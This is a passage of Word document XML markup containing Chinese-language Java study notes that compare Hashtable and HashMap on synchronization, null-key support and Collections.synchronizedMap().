          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Java 1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>引进的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口的一个实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44C78" w:rsidRPr="00F41A4C" w:rsidRDefault="00B44C78" w:rsidP="00B44C78">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同步性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是线程安全的，也就是说是同步的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是线程序不安全的，不是同步的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44C78" w:rsidRPr="00F41A4C" w:rsidRDefault="00B44C78" w:rsidP="00B44C78">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>值：只有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可以让你将空值作为一个表的条目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027153" w:rsidRPr="00F41A4C" w:rsidRDefault="00027153" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00655D0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00655D0F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>两者最主要的区别在于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>是线程安全，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>则非线程安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的实现方法里面都添加了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键字来确保线程同步，因此相对而言</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>性能会高一些，我们平时使用时若无特殊需求建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在多线程环境下若使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collections.synchronizedMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法来获取一个线程安全的集合（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collections.synchronizedMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现原理是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SynchronizedMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的内部类，这个类实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口，在调用方法时使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来保证线程同步</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当然了实际上操作的还是我们传入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例，简单的说就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collections.synchronizedMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法帮我们在操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时自动添加了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来实现线程同步，类似的其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collections.synchronizedXX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法也是类似原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00655D0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00655D0F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>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lastRenderedPageBreak/>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则不允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
